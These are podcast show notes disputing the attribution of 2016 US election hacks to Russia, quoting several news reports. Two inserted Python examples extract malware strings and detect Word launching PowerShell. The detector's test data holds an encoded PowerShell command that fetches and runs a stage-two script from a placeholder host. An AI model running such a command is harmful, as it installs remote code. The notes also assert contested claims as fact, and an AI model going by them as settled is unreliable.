WFMU-FM is podcasting For The Record–You can subscribe to the podcast HERE.
This broadcast was recorded in one, 60-minute segment.
Introduction: As we have noted in many previous broadcasts and posts, cyber attacks are easily disguised. Perpetrating a “cyber false flag” operation is disturbingly easy to do.
This is of paramount significance in evaluating the increasingly neo-McCarthyite New Cold War propaganda about “Russian interference” in the U.S. election.
Compounding the situation are some recent disclosures and developments:
- We learn that the CIA’s hacking tools are specifically crafted to mask CIA authorship of the attacks. Most significant, for our purposes, is the fact that the Agency’s hacking tools are engineered in such a way as to permit the authors of the event to represent themselves as Russian.
- The NSA’s elite hacking technology has been made widely available to the hacking community, courtesy of “The Shadow Brokers.”
- During the 2016 Presidential campaign, Michael Flynn was professionally involved with numerous cyber-security and cyber arms manufacturing firms: “ . . . . The month before Flynn joined the advisory board of OSY Technologies, NSO Group opened up a new arm called WestBridge Technologies, Inc., in the D.C. region. (The company was originally registered in Delaware in 2014, but formed in Maryland in April 2016.) Led by NSO Group co-founder Lavie, WestBridge is vying for federal government contracts for NSO Group’s products. Hiring Flynn would provide NSO Group with a well-connected figure in Washington, to help get its foot in the door of the notoriously insular world of secret intelligence budgeting. . . . ‘When you’re trying to build up your business, you need someone who has connections, someone who is seen as an authority and a legitimate presence,’ Johnson said. Hiring someone with Flynn’s background in intelligence would ‘open up doors that they wouldn’t have had access to,’ Johnson said. Throughout 2016, Flynn worked for a number of cybersecurity firms personally and through his consulting firm, Flynn Intel Group. In addition to his advisory board seat at OSY Technologies, he sat on the board of Adobe Systems, a large software company with Pentagon contracts, and the boards of the cybersecurity companies GreenZone Systems and HALO Privacy. (Though Flynn described himself as an Adobe advisory board member in his financial disclosure paperwork, the group said in a statement that he provided only ‘periodic counsel to Adobe’s public sector team.’) . . .”
- NSO Group and OSY Technologies specialize in spear-phishing attacks, one of the methodologies used in the hacks of U.S. election computers. Is there any link between Flynn’s cyber-security/cyber arms links and the high-profile hacks during the campaign?
- A GOP tech database–Deep Root–exposed the data of almost two hundred million American voters to widespread scrutiny. Is there any connection between Deep Root, the GOP and the alleged Russian hacking of U.S. voting computers?
Following a Bloomberg report about widespread Russian hacking of American election systems: “ . . . . Kay Stimson, spokeswoman for the National Association of Secretaries of State, said the members of her group — which represents the chief election officials in 40 states — were taken aback by the allegation that 39 states were hacked. ‘We cannot verify any information in that report,’ Stimson told Benzinga. ‘It has some claims that have raised some red flags. I don’t know where they’re getting it. We’re not able to assess the credibility.’ She said that some cybersecurity firms were engaging in scare tactics at the state and local levels. ‘There are cybersecurity firms making some wild claims,’ she said. ‘It is a very aggressive industry.’ . . .”
With the high-profile hacks being attributed–almost certainly falsely–to Russia, there are ominous developments taking place that may well lead to a Third World War. During the closing days of his Presidency, Obama authorized the planting of cyber weapons on Russian computer networks. Obama did this after talking with Putin on the Hot Line, established to prevent a Third World War. Putin denied interfering in the U.S. election.
The conclusion that Russia hacked the U.S. election on Putin’s orders appears to have been based on a CIA source in the Kremlin. Even when that intelligence was delivered, other agencies weren’t ready to accept the CIA’s conclusion, and it took intelligence from another nation (not named) to provide the final tipping point that led to a broad-based conclusion that not only was the Russian government behind the cyberattacks but that Vladimir Putin himself ordered them.
That ally’s intelligence is described as “the most critical technical intelligence on Russia”; however, the NSA still wasn’t convinced, based on what sounds like a lack of confidence in that source. Thus, it looks like a CIA Kremlin source and an unnamed foreign intelligence agency of questionable credibility are the basis of what appears to be a likely future full-scale US/Russian cyberwar.
Of paramount significance is the fact that IF, on Putin’s orders (and we are asked to believe as much), Russia continued to hack U.S. computer systems to influence the election, Putin would have to have gone utterly mad. Those hacks would have precluded any rapprochement between Russia and the United States under a President Trump. There is no indication that Putin went off the deep end.
Also auguring a Third World War are two developments in Syria. Seymour Hersh published an article in Die Welt revealing that not only was the April 4 alleged Sarin attack NOT a chemical weapons attack, but that there was widespread knowledge of this in American military and intelligence circles.
Ominously, the Trump White House is claiming they have advance knowledge of an impending Syrian chemical weapons strike and will punish Syria heavily, and hold Russia accountable.
Program Highlights Include: The fact that the bulk of activity detected by the DHS on U.S. election systems was “scanning”–standard operating procedure for hacking; a former NSA hacking specialist–Jake Williams–said that the spear-phishing operation was of “medium sophistication,” one that “practically any hacker can pull off”; the question of whether or not GOP Secretaries of State might have deliberately responded to the spear-phishing e‑mails that permitted the “hit” on U.S. election systems; the Russian authorization of the use by the Syrian air force of a smart bomb to eliminate Al-Qaeda-linked jihadists; the release of a chemical cloud as a result of that strike that was caused by secondary explosions; Cambridge Analytica’s hiring of GOP online data-basing kingpin Darren Bolding.
1a. As we have noted in many previous broadcasts and posts, cyber attacks are easily disguised. Perpetrating a “cyber false flag” operation is disturbingly easy to do. In a world where the verifiably false and physically impossible “controlled demolition”/Truther nonsense has gained traction, cyber false flag ops are all the more threatening and sinister.
Now, we learn that the CIA’s hacking tools are specifically crafted to mask CIA authorship of the attacks. Most significant, for our purposes, is the fact that the Agency’s hacking tools are engineered in such a way as to permit the authors of the event to represent themselves as Russian.
This is of paramount significance in evaluating the increasingly neo-McCarthyite New Cold War propaganda about “Russian interference” in the U.S. election.
This morning, WikiLeaks released part 3 of its Vault 7 series, called Marble. Marble reveals CIA source code files along with decoy languages that might disguise viruses, trojans, and hacking attacks. These tools could make it more difficult for anti-virus companies and forensic investigators to attribute hacks to the CIA. Could this call the source of previous hacks into question? It appears that yes, this might be used to disguise the CIA’s own hacks to appear as if they were Russian, Chinese, or from specific other countries. These tools were in use in 2016, WikiLeaks reported.
It’s not known exactly how this Marble tool was actually used. However, according to WikiLeaks, the tool could make it more difficult for investigators and anti-virus companies to attribute viruses and other hacking tools to the CIA. Test examples weren’t just in English, but also Russian, Chinese, Korean, Arabic, and Farsi. This might allow a malware creator to not only look like they were speaking in Russian or Chinese, rather than in English, but to also look like they tried to hide that they were not speaking English, according to WikiLeaks. This might also hide fake error messages or be used for other purposes. . . .
1b. There has been a widely-circulated report about how the election systems of 39 US states were “hit” by ‘Russian hackers’, most of them just a week before the 2016 November election. Well, the National Association of Secretaries of State, an organization that represents the chief election officials in 40 states, has a rebuttal: they have no idea what this report was talking about and believe it’s a matter of cybersecurity firms being overly aggressive in order to win state contracts to protect election systems.
Again, quite a rebuttal–they have no idea what the Bloomberg report was saying: “ . . . . Kay Stimson, spokeswoman for the National Association of Secretaries of State, said the members of her group — which represents the chief election officials in 40 states — were taken aback by the allegation that 39 states were hacked.
‘We cannot verify any information in that report,’ Stimson told Benzinga. ‘It has some claims that have raised some red flags. I don’t know where they’re getting it. We’re not able to assess the credibility.’ . . .”
Ms. Stimson also noted that cyber security firms appeared to be ramping up the hype in order to further their own commercial agendas.
“ . . . Cyber Security Firms Capitalizing On Russian Scare
She said that some cybersecurity firms were engaging in scare tactics at the state and local levels.
‘There are cybersecurity firms making some wild claims,’ she said. ‘It is a very aggressive industry.’ . . .”
In addition the Department of Homeland Security is also downplaying the significance of the report:
“ . . . . Bloomberg attributed the number of states ‘hit’ — Stimson questioned the meaning of the word — to the systems in 39 states. ‘It’s hard to say how they “hit” 39 states,’ she said.
Homeland Security also issued a report about the Bloomberg report, saying: ‘While we are not going to get into specifics of activity at the state level, the vast majority of what we saw was scanning — not attempts to intrude — and unsuccessful attempts to steal data held in voter registration databases.’ . . . .”
State election officials are baffled by a Bloomberg report alleging that Russian hackers compromised the voting systems in 39 states, adding that cybersecurity firms were engaging in scare tactics to win state and local contracts to protect election systems.
The June 13 Bloomberg story said that hackers staged incursions last year into voter databases and software systems in almost twice as many states as previously reported.
“In Illinois, investigators found evidence that cyber intruders tried to delete or alter voter data. The hackers accessed software designed to be used by poll workers on Election Day, and in at least one state accessed a campaign finance database,” the report said.
It cited three unnamed sources with direct knowledge of “the U.S. investigation into the matter.”
“In all, the Russian hackers hit systems in a total of 39 states, one of them said,” the report said.
The National Security Agency, the FBI and the U.S. Homeland Security Department all are looking into various aspects of what intelligence officials said was Russian meddling into the U.S. election systems.
Kay Stimson, spokeswoman for the National Association of Secretaries of State, said the members of her group — which represents the chief election officials in 40 states — were taken aback by the allegation that 39 states were hacked.
“We cannot verify any information in that report,” Stimson told Benzinga. “It has some claims that have raised some red flags. I don’t know where they’re getting it. We’re not able to assess the credibility.”
Cyber Security Firms Capitalizing On Russian Scare
She said that some cybersecurity firms were engaging in scare tactics at the state and local levels.
“There are cybersecurity firms making some wild claims,” she said. “It is a very aggressive industry.”
Bloomberg attributed the number of states “hit” — Stimson questioned the meaning of the word — to the systems in 39 states. “It’s hard to say how they ‘hit’ 39 states,” she said.
Homeland Security also issued a report about the Bloomberg report, saying: “While we are not going to get into specifics of activity at the state level, the vast majority of what we saw was scanning — not attempts to intrude — and unsuccessful attempts to steal data held in voter registration databases.”
Little Doubt Russian Meddling In Election
Despite the reaction to the Bloomberg report, there is little doubt that Russian actors attempted to access U.S. election systems. Special investigator Robert Mueller has been tasked with spearheading the investigation into whether the Trump campaign colluded with Kremlin affiliates to leak damaging emails and rig the election.
…
2a. The information presented above certainly supports the notion that the claim that “39 states were hacked by the Russians” was, at a minimum, an exaggeration. And when DHS says the “vast majority” of what it saw was “scanning”, keep in mind that scanning of computers connected to the internet is ubiquitous. If IP addresses were used to attribute that scanning to “Russian hackers”, then the US intelligence report on the evidence for ‘Russian hackers’ in the DNC server hack is a good indication of how IP addresses are being used to assess culpability, and in that case IP addresses were not very compelling evidence:
“Did the Russians Really Hack the DNC?” by Gregory Elich; Counter Punch; 1/13/2017.
Russia, we are told, breached the servers of the Democratic National Committee (DNC), swiped emails and other documents, and released them to the public, to alter the outcome of the U.S. presidential election.
How substantial is the evidence backing these assertions?
…
Command-and-control servers remotely issue malicious commands to infected machines. Oddly, for such a key component of the operation, the command-and-control IP address in both attacks was hard-coded in the malware. This seems like another inexplicable choice, given that the point of an advanced persistent threat is to operate for an extended period without detection. A more suitable approach would be to use a Domain Name System (DNS) address, which is a decentralized computer naming system. That would provide a more covert means of identifying the command-and-control server. [13] Moreover, one would expect that address to be encrypted. Using a DNS address would also allow the command-and-control operation to easily move to another server if its location is detected, without the need to modify and reinstall the code.
One of the IP addresses is claimed to be a “well-known APT 28” command-and-control address, while the second is said to be linked to Russian military intelligence. [14] The first address points to a server located in San Jose, California, and is operated by a server hosting service. [15] The second server is situated in Paris, France, and owned by another server hosting service. [16] Clearly, these are servers that have been compromised by hackers. It is customary for hackers to route their attacks through vulnerable computers. The IP addresses of compromised computers are widely available on the Deep Web, and typically a hacked server will be used by multiple threat actors. These two particular servers may or may not have been regularly utilized by Russian Intelligence, but they were not uniquely so used. Almost certainly, many other hackers would have used the same machines, and it cannot be said that these IP addresses uniquely identify an infiltrator. Indeed, the second IP address is associated with the common Trojan viruses Agent-APPR and Shunnael.[17]
“Everyone is focused on attribution, but we may be missing the bigger truth,” says Joshua Corman, Director of the Cyber Statecraft Initiative at the Atlantic Council. “[T]he level of sophistication required to do this hack was so low that nearly anyone could do it.” [18] . . .
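The Marble decoy-language strings described in 1a and the hard-coded command-and-control addresses Elich discusses above are both artifacts an analyst pulls out of a sample with a strings pass. The following Python script is an added example, not code from WikiLeaks, Elich or this program. It runs over a constructed byte blob (RFC 5737 documentation addresses and an example.net hostname, no real indicators), extracts the printable strings, separates hard-coded IPv4 literals and hostnames from natural-language text, and tallies which writing system each text string uses, which is exactly the kind of tally a single planted Cyrillic or Chinese string can skew. The sample blob, the decoy phrases and the `summarize`/`script_share` helper names are all assumptions made for the example.

```python
"""Pull strings and network indicators out of a binary blob and tally the writing
systems they use.  Added analyst-side example (not from WikiLeaks, Elich or this
program): it shows what a strings pass actually yields and why neither a
hard-coded C2 address nor the language of embedded text is strong authorship
evidence on its own."""
import ipaddress
import re
import unicodedata
from collections import Counter

# Constructed sample, not a real specimen.  The address is an RFC 5737
# documentation range, the hostname is an example.* name, and the decoy strings
# are ordinary "module load error" / "file corrupted" phrases in Russian and Chinese.
SAMPLE_BLOB = (
    b"MZ\x90\x00\x03\x00\x00\x00"
    b"POST /gate.php HTTP/1.1\x00"
    b"203.0.113.7\x00"                      # hard-coded C2 address
    b"updates.example.net\x00"              # a resolvable name, as Elich suggests
    b"Error: file not found\x00"
    + "Ошибка загрузки модуля".encode("utf-8") + b"\x00"   # Russian decoy string
    + "文件已损坏".encode("utf-8") + b"\x00"               # Chinese decoy string
    + b"\x13\x37\xde\xad"
)

STRING_RUN = re.compile(rb"[\x20-\x7e\x80-\xff]{4,}")
IPV4_RE = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")
DOMAIN_RE = re.compile(r"^(?:[a-z0-9-]{1,63}\.)+[a-z]{2,63}$", re.IGNORECASE)


def extract_strings(blob, min_len=4):
    """Runs of printable ASCII or high bytes, decoded as UTF-8 (invalid bytes dropped)."""
    out = []
    for m in STRING_RUN.finditer(blob):
        s = m.group().decode("utf-8", errors="ignore").strip()
        if len(s) >= min_len:
            out.append(s)
    return out


def classify(s):
    """('ipv4', 'global'|'non-global'), ('domain', None), ('text', SCRIPT) or ('other', None)."""
    if IPV4_RE.match(s):
        try:
            addr = ipaddress.ip_address(s)
        except ValueError:          # e.g. an octet above 255
            return ("other", None)
        return ("ipv4", "global" if addr.is_global else "non-global")
    if DOMAIN_RE.match(s):
        return ("domain", None)
    # First word of the Unicode character name is the script: LATIN, CYRILLIC, CJK, ARABIC ...
    scripts = Counter(unicodedata.name(ch, "UNKNOWN").split()[0]
                      for ch in s if ch.isalpha())
    if not scripts:
        return ("other", None)
    return ("text", scripts.most_common(1)[0][0])


def summarize(blob, min_len=4):
    """Indicator report: hard-coded addresses, hostnames and a per-script string count."""
    report = {"ipv4": [], "domain": [], "scripts": Counter(), "strings": []}
    for s in extract_strings(blob, min_len):
        kind, detail = classify(s)
        report["strings"].append(s)
        if kind == "ipv4":
            report["ipv4"].append((s, detail))
        elif kind == "domain":
            report["domain"].append(s)
        elif kind == "text":
            report["scripts"][detail] += 1
    return report


def script_share(report):
    """Fraction of text strings per writing system; one planted string moves this noticeably."""
    total = sum(report["scripts"].values())
    return {k: v / total for k, v in report["scripts"].items()} if total else {}


if __name__ == "__main__":
    rep = summarize(SAMPLE_BLOB)
    print("hard-coded IPv4:", rep["ipv4"])
    print("hostnames:", rep["domain"])
    print("script share:", script_share(rep))
```

The report deliberately stops at counts and never emits an attribution verdict: with two Latin-script strings, one Cyrillic and one Chinese, the "language" of the sample is whatever the author chose to embed, and the `is_global` flag only says whether the hard-coded address is routable, not who rents the machine behind it, which is Elich's point about shared hosting servers.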
2b. Since digital “signatures” are easily spoofed by hackers and a declaration of cyber war would be an insane move by the Russian government, there’s the very obvious possibility that someone else made all these hacking attempts.
It’s worth noting that in The Intercept report about the leaked NSA document showing the analysis of the hacking of a Florida voting systems company, the article features an interview with Jake Williams – a former member of NSA’s elite hacking Tailored Access Operations team – and asks him about the spear-phishing campaign used against those 122 officials in the last week of the campaign. According to Williams, that spear-phishing operation was of “medium sophistication”, one that “practically any hacker can pull off”.
The spear-phishing attacks used documents from the Florida-based “VR Systems” as the bait. That’s what the alleged Russian hackers did in the last week of the campaign. And how sophisticated was this spear-phishing attack? Almost any hacker could have done it.
“ . . . . According to Williams, if this type of attack were successful, the perpetrator would possess ‘unlimited’ capacity for siphoning away items of interest. ‘Once the user opens up that email [attachment],’ Williams explained, ‘the attacker has all the same capabilities that the user does.’ Vikram Thakur, a senior research manager at Symantec’s Security Response Team, told The Intercept that in cases like this the ‘quantity of exfiltrated data is only limited by the controls put in place by network administrators.’ Data theft of this variety is typically encrypted, meaning anyone observing an infected network wouldn’t be able to see what exactly was being removed but should certainly be able to tell something was afoot, Williams added. Overall, the method is one of ‘medium sophistication,’ Williams said, one that ‘practically any hacker can pull off.’ . . . .”
…
So according to federal investigators, ‘the GRU’ used a spear-phishing technique that any hacker could have pulled off, and did it in a manner that left digital “signatures”, like IP addresses, that apparently led back to the GRU. The culprits also kept the same digital signatures in the July 2016 hack on the Illinois voting system that were found in the wave of spear-phishing attacks in the last week of the campaign. And they did so even after getting, for the first time ever, a “cyber Red Phone” call from the White House in October, thus opening Russia to potential revenge attacks for years to come and poison-pilling the possible utility of having a Russian-friendly President Trump in the White House. It’s as if the cost-benefit analysis didn’t factor in the costs. That’s the story we’re supposed to accept.
And, amazingly, based on the first report, it sounds like the bulk of the 39 hacked states got hacked by this spear-phishing campaign in the last week of the campaign, despite the intense focus on potential hacking in the prior months. Those must have been some pretty compelling phishing emails.
It raises the question as to whether or not some of those 122 targeted officials were trying to get their systems hacked. Keep in mind one of the very interesting things about a spear-phishing attack in a scenario like this: one of the hacked parties (the GOP) just might want to get hacked. Spear-phishing is a great way for an insider to invite in a hacker while maintaining plausible deniability. (Oops! I was tricked!)
Russian military intelligence executed a cyberattack on at least one U.S. voting software supplier and sent spear-phishing emails to more than 100 local election officials just days before last November’s presidential election, according to a highly classified intelligence report obtained by The Intercept.
The top-secret National Security Agency document, which was provided anonymously to The Intercept and independently authenticated, analyzes intelligence very recently acquired by the agency about a months-long Russian intelligence cyber effort against elements of the U.S. election and voting infrastructure. The report, dated May 5, 2017, is the most detailed U.S. government account of Russian interference in the election that has yet come to light.
While the document provides a rare window into the NSA’s understanding of the mechanics of Russian hacking, it does not show the underlying “raw” intelligence on which the analysis is based. A U.S. intelligence officer who declined to be identified cautioned against drawing too big a conclusion from the document because a single analysis is not necessarily definitive.
The report indicates that Russian hacking may have penetrated further into U.S. voting systems than was previously understood. It states unequivocally in its summary statement that it was Russian military intelligence, specifically the Russian General Staff Main Intelligence Directorate, or GRU, that conducted the cyber attacks described in the document:
Russian General Staff Main Intelligence Directorate actors … executed cyber espionage operations against a named U.S. company in August 2016, evidently to obtain information on elections-related software and hardware solutions. … The actors likely used data obtained from that operation to … launch a voter registration-themed spear-phishing campaign targeting U.S. local government organizations.
This NSA summary judgment is sharply at odds with Russian President Vladimir Putin’s denial last week that Russia had interfered in foreign elections: “We never engaged in that on a state level, and have no intention of doing so.” Putin, who had previously issued blanket denials that any such Russian meddling occurred, for the first time floated the possibility that freelance Russian hackers with “patriotic leanings” may have been responsible. The NSA report, on the contrary, displays no doubt that the cyber assault was carried out by the GRU.
…
The Spear-Phishing Attack
As described by the classified NSA report, the Russian plan was simple: pose as an e‑voting vendor and trick local government employees into opening Microsoft Word documents invisibly tainted with potent malware that could give hackers full control over the infected computers.
But in order to dupe the local officials, the hackers needed access to an election software vendor’s internal systems to put together a convincing disguise. So on August 24, 2016, the Russian hackers sent spoofed emails purporting to be from Google to employees of an unnamed U.S. election software company, according to the NSA report. Although the document does not directly identify the company in question, it contains references to a product made by VR Systems, a Florida-based vendor of electronic voting services and equipment whose products are used in eight states.
The spear-phishing email contained a link directing the employees to a malicious, faux-Google website that would request their login credentials and then hand them over to the hackers. The NSA identified seven “potential victims” at the company. While malicious emails targeting three of the potential victims were rejected by an email server, at least one of the employee accounts was likely compromised, the agency concluded. The NSA notes in its report that it is “unknown whether the aforementioned spear-phishing deployment successfully compromised all the intended victims, and what potential data from the victim could have been exfiltrated.”
VR Systems declined to respond to a request for comment on the specific hacking operation outlined in the NSA document. Chief Operating Officer Ben Martin replied by email to The Intercept’s request for comment with the following statement:
Phishing and spear-phishing are not uncommon in our industry. We regularly participate in cyber alliances with state officials and members of the law enforcement community in an effort to address these types of threats. We have policies and procedures in effect to protect our customers and our company.
Although the NSA report indicates that VR Systems was targeted only with login-stealing trickery, rather than computer-controlling malware, this isn’t necessarily a reassuring sign. Jake Williams, founder of computer security firm Rendition Infosec and formerly of the NSA’s Tailored Access Operations hacking team, said stolen logins can be even more dangerous than an infected computer. “I’ll take credentials most days over malware,” he said, since an employee’s login information can be used to penetrate “corporate VPNs, email, or cloud services,” allowing access to internal corporate data. The risk is particularly heightened given how common it is to use the same password for multiple services. Phishing, as the name implies, doesn’t require everyone to take the bait in order to be a success — though Williams stressed that hackers “never want just one” set of stolen credentials.
In any event, the hackers apparently got what they needed. Two months later, on October 27, they set up an “operational” Gmail account designed to appear as if it belonged to an employee at VR Systems, and used documents obtained from the previous operation to launch a second spear-phishing operation “targeting U.S. local government organizations.” These emails contained a Microsoft Word document that had been “trojanized” so that when it was opened it would send out a beacon to the “malicious infrastructure” set up by the hackers.
The NSA assessed that this phase of the spear-phishing operation was likely launched on either October 31 or November 1 and sent spear-phishing emails to 122 email addresses “associated with named local government organizations,” probably to officials “involved in the management of voter registration systems.” The emails contained Microsoft Word attachments purporting to be benign documentation for VR Systems’ EViD voter database product line, but which were in reality maliciously embedded with automated software commands that are triggered instantly and invisibly when the user opens the document. These particular weaponized files used PowerShell, a Microsoft scripting language designed for system administrators and installed by default on Windows computers, allowing vast control over a system’s settings and functions. If opened, the files “very likely” would have instructed the infected computer to begin downloading in the background a second package of malware from a remote server also controlled by the hackers, which the secret report says could have provided attackers with “persistent access” to the computer or the ability to “survey the victims for items of interest.” Essentially, the weaponized Word document quietly unlocks and opens a target’s back door, allowing virtually any cocktail of malware to be subsequently delivered automatically.
According to Williams, if this type of attack were successful, the perpetrator would possess “unlimited” capacity for siphoning away items of interest. “Once the user opens up that email [attachment],” Williams explained, “the attacker has all the same capabilities that the user does.” Vikram Thakur, a senior research manager at Symantec’s Security Response Team, told The Intercept that in cases like this the “quantity of exfiltrated data is only limited by the controls put in place by network administrators.” Data theft of this variety is typically encrypted, meaning anyone observing an infected network wouldn’t be able to see what exactly was being removed but should certainly be able to tell something was afoot, Williams added. Overall, the method is one of “medium sophistication,” Williams said, one that “practically any hacker can pull off.”
The NSA, however, is uncertain about the results of the attack, according to the report. “It is unknown,” the NSA notes, “whether the aforementioned spear-phishing deployment successfully compromised the intended victims, and what potential data could have been accessed by the cyber actor.” . . . .
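The chain the NSA report describes, a Word attachment that hands PowerShell a hidden, encoded instruction to fetch a second stage, leaves a process tree that endpoint telemetry records: an Office application as parent, a script host as child, and a command line carrying the encoded argument. The Python below is an added defender-side example, not code from The Intercept, the NSA or VR Systems. It assumes process-creation events in JSON-lines form with constructed field names (`ts`, `host`, `image`, `parent_image`, `cmdline`), decodes any `-EncodedCommand` argument back to text, and scores Office-to-script-host launches together with hidden-window, profile-bypass and download indicators. The four sample events, the RFC 5737 address in them and the scoring thresholds are all constructed for the example.

```python
"""Flag Office applications spawning script hosts, the behaviour the NSA report
attributes to the trojanized Word attachments.  Added defender-side example over
constructed JSON-lines process events; field names are an assumption, not any
product's schema."""
import base64
import json
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

ENCODED_RE = re.compile(r"(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
HIDDEN_RE = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")
NOPROFILE_RE = re.compile(r"(?i)-nop(?:rofile)?\b")
DOWNLOAD_RE = re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|"
                         r"\biwr\b|start-bitstransfer|net\.webclient")

# Constructed stage-two fetch of the kind a macro hands to PowerShell; the
# address is from the RFC 5737 documentation range, not a real server.
_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/stage2.ps1')"
_ENC = base64.b64encode(_STAGE2.encode("utf-16-le")).decode("ascii")
_PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
_WORD = "C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE"

# Constructed telemetry: one weaponized-document chain, one benign admin
# session, one Office-launched shell, one legitimate Office print helper.
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"ts": "2016-11-01T09:14:02Z", "host": "clerk-pc01", "image": _PS,
     "parent_image": _WORD,
     "cmdline": "powershell.exe -NoP -W Hidden -Enc " + _ENC},
    {"ts": "2016-11-01T09:20:11Z", "host": "admin-pc07", "image": _PS,
     "parent_image": "C:\\Windows\\explorer.exe",
     "cmdline": "powershell.exe Get-ChildItem C:\\Logs"},
    {"ts": "2016-11-01T09:31:45Z", "host": "clerk-pc02",
     "image": "C:\\Windows\\System32\\cmd.exe",
     "parent_image": "C:\\Program Files\\Microsoft Office\\Office16\\EXCEL.EXE",
     "cmdline": "cmd.exe /c whoami"},
    {"ts": "2016-11-01T09:40:03Z", "host": "clerk-pc01",
     "image": "C:\\Windows\\splwow64.exe", "parent_image": _WORD,
     "cmdline": "C:\\Windows\\splwow64.exe 12288"},
])


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind a -EncodedCommand argument, or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(ev):
    """Score one process-creation event; reasons list what fired."""
    reasons, score = [], 0
    child, parent = basename(ev["image"]), basename(ev["parent_image"])
    cmd = ev.get("cmdline", "")
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        reasons.append(parent + " spawned " + child); score += 50
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded command"); score += 20
    if HIDDEN_RE.search(cmd):
        reasons.append("hidden window"); score += 10
    if NOPROFILE_RE.search(cmd):
        reasons.append("profile bypass"); score += 5
    if DOWNLOAD_RE.search(cmd + "\n" + (decoded or "")):   # scan raw and decoded text
        reasons.append("download primitive"); score += 30
    severity = "high" if score >= 70 else "medium" if score >= 40 else "low" if score else "none"
    return {"host": ev["host"], "ts": ev["ts"], "score": score,
            "severity": severity, "reasons": reasons, "decoded": decoded}


def scan_log(text):
    """Parse JSON-lines events and return the ones worth a look, highest score first."""
    hits = [analyze_event(json.loads(line)) for line in text.splitlines() if line.strip()]
    return sorted((h for h in hits if h["score"]), key=lambda h: -h["score"])


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["severity"], hit["host"], hit["ts"], hit["reasons"])
        if hit["decoded"]:
            print("   decoded:", hit["decoded"])
```

The decode step matters: the raw command line of the first event contains nothing that a string match for `DownloadString` would catch, so a rule that only inspects the visible arguments scores it as a hidden encoded launch and misses the download primitive entirely. The `splwow64.exe` event shows the other side of the same parent-child rule: Word legitimately spawns helpers, so the alert keys on the child being a script host rather than on Word spawning anything at all.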
3. The conclusion that Russia hacked the U.S. election on Putin’s orders appears to have been based on a CIA source in the Kremlin. Even when that intelligence was delivered, other agencies weren’t ready to accept the CIA’s conclusion, and it took intelligence from another nation (not named) to provide the final tipping point that led to a broad-based conclusion that not only was the Russian government behind the cyberattacks but that Vladimir Putin himself ordered them.
That ally’s intelligence is described as “the most critical technical intelligence on Russia”; however, the NSA still wasn’t convinced, based on what sounds like a lack of confidence in that source. Thus, it looks like a CIA Kremlin source and an unnamed foreign intelligence agency of questionable credibility are the basis of what appears to be a likely future full-scale US/Russian cyberwar.
“ . . . . Inside was an intelligence bombshell, a report drawn from sourcing deep inside the Russian government that detailed Russian President Vladimir Putin’s direct involvement in a cyber campaign to disrupt and discredit the U.S. presidential race. . . .”
We are told that a CIA deep Russian government source is the primary source of the ‘Putin ordered it’ conclusion. Well, at least that’s better than the bad joke technical evidence that’s been provided thus far. But even that source’s claims apparently weren’t enough to convince other parts of the intelligence community. It took the intelligence from the unnamed ally to do that:
“ . . . . But it went further. The intelligence captured Putin’s specific instructions on the operation’s audacious objectives — defeat or at least damage the Democratic nominee, Hillary Clinton, and help elect her opponent, Donald Trump.
At that point, the outlines of the Russian assault on the U.S. election were increasingly apparent. Hackers with ties to Russian intelligence services had been rummaging through Democratic Party computer networks, as well as some Republican systems, for more than a year. In July, the FBI had opened an investigation of contacts between Russian officials and Trump associates. And on July 22, nearly 20,000 emails stolen from the Democratic National Committee were dumped online by WikiLeaks.
But at the highest levels of government, among those responsible for managing the crisis, the first moment of true foreboding about Russia’s intentions arrived with that CIA intelligence.
…
It took time for other parts of the intelligence community to endorse the CIA’s view. Only in the administration’s final weeks in office did it tell the public, in a declassified report, what officials had learned from Brennan in August — that Putin was working to elect Trump.
…
Despite the intelligence the CIA had produced, other agencies were slower to endorse a conclusion that Putin was personally directing the operation and wanted to help Trump. “It was definitely compelling, but it was not definitive,” said one senior administration official. “We needed more.”
Some of the most critical technical intelligence on Russia came from another country, officials said. Because of the source of the material, the NSA was reluctant to view it with high confidence. . . .
. . . . In a subsequent news conference, Obama alluded to the exchange and issued a veiled threat. “We’re moving into a new era here where a number of countries have significant capacities,” he said. “Frankly, we’ve got more capacity than anybody both offensively and defensively.” . . . .
. . . . Then, on Oct. 31, the administration delivered a final pre-election message via a secure channel to Moscow originally created to avert a nuclear exchange. The message noted that the United States had detected malicious activity, originating from servers in Russia, targeting U.S. election systems and warned that meddling would be regarded as unacceptable interference. Russia confirmed the next day that it had received the message but replied only after the election through the same channel, denying the accusation. . . .
. . . . But Obama also signed the secret finding, officials said, authorizing a new covert program involving the NSA, CIA and U.S. Cyber Command. . . .
. . . . The cyber operation is still in its early stages and involves deploying “implants” in Russian networks deemed “important to the adversary and that would cause them pain and discomfort if they were disrupted,” a former U.S. official said.
The implants were developed by the NSA and designed so that they could be triggered remotely as part of a retaliatory cyber-strike in the face of Russian aggression, whether an attack on a power grid or interference in a future presidential race.
Officials familiar with the measures said that there was concern among some in the administration that the damage caused by the implants could be difficult to contain.
As a result, the administration requested a legal review, which concluded that the devices could be controlled well enough that their deployment would be considered “proportional” in varying scenarios of Russian provocation, a requirement under international law.
The operation was described as long-term, taking months to position the implants and requiring maintenance thereafter. Under the rules of covert action, Obama’s signature was all that was necessary to set the operation in motion.
U.S. intelligence agencies do not need further approval from Trump, and officials said that he would have to issue a countermanding order to stop it. The officials said that they have seen no indication that Trump has done so. . . .”
